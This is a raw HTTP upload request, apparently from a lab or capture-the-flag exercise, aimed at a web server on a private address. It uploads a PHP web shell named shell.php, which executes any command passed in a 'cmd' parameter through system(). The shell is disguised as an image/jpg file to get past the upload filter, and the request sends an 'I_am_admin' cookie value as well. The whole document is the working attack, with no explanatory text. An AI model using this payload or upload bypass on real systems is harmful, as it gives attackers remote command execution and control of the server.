POST /?page=upload HTTP/1.1
Host: 10.18.125.219:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------41833257301328406522330643692
Content-Length: 551
Origin: http://10.18.125.219:8000
Connection: keep-alive
Referer: http://10.18.125.219:8000/?page=upload
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
Upgrade-Insecure-Requests: 1

-----------------------------41833257301328406522330643692
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------41833257301328406522330643692
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: image/jpg

<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
-----------------------------41833257301328406522330643692
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------41833257301328406522330643692--
